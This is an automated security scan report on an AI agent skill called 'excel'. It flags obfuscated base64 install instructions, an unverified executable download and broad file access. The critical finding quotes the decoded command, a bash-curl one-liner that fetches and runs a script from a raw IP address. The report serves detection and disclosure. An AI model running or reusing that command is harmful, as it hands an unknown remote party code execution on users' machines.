Trust Assessment
excel received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 1 high, 1 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated Remote Code Execution via Base64-encoded Shell Command, Direct Download and Execution of Untrusted Executable.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/moonshine-100rze/excel-1kl/SKILL.md:12 | |
| CRITICAL | Obfuscated Remote Code Execution via Base64-encoded Shell Command The skill's prerequisites for macOS instruct the user to copy and run a base64-encoded shell command. This command decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/q0c7ew2ro8l2cfqp)"`, which downloads and executes an arbitrary script from an external, untrusted IP address (`91.92.242.30`) directly into the user's shell. This allows for immediate remote code execution with the privileges of the user running the command, posing an extreme security risk. The use of base64 encoding attempts to obscure the malicious nature of the command, also constituting a hidden instruction. Remove the instruction to execute arbitrary shell commands, especially those involving remote script execution from untrusted sources. Provide a secure, verifiable installation method, such as a package manager or a signed installer. | LLM | SKILL.md:16 | |
| HIGH | Direct Download and Execution of Untrusted Executable The skill's prerequisites for Windows instruct the user to download a `.zip` file containing an executable (`openclawcore-1.0.3.zip`) from a GitHub release and run it. While GitHub is a common platform, downloading and executing arbitrary binaries from a skill description without further verification (e.g., code signing, checksums) introduces a significant supply chain risk. A compromised GitHub account or release could lead to the distribution of malware. The skill implicitly relies on the user to execute this untrusted code, which then becomes the backend for the skill's operations, effectively enabling command injection if the `openclaw-core` utility itself has vulnerabilities or can be manipulated by skill inputs. Provide a more secure installation method, such as a signed installer, a package manager, or clear instructions for verifying the integrity of the downloaded executable (e.g., SHA256 checksums). Avoid instructing users to directly download and run executables from arbitrary URLs. | LLM | SKILL.md:13 | |
| MEDIUM | Broad Local File System Access The skill is designed to interact extensively with the local file system, accepting `filePath` and `outputPath` parameters for various actions (e.g., `readSheet`, `writeData`, `exportCsv`). This grants the underlying `openclaw-core` utility (and by extension, the skill) broad read/write access to potentially any file on the user's system, limited only by the permissions of the process running `openclaw-core`. While necessary for its functionality, this broad access, especially when combined with the untrusted nature of the `openclaw-core` installation (as identified in other findings), creates a significant attack surface for data exfiltration or unauthorized file modification if the skill's inputs can be manipulated. Implement strict input validation and sanitization for all file paths. Consider sandboxing the `openclaw-core` utility or restricting its file system access to specific, user-designated directories. Clearly communicate the file system access requirements and potential risks to the user. | LLM | SKILL.md:35 |
Scan History
Embed Code
[](https://skillshield.io/report/bf26a6b5c7917c7c)
Powered by SkillShield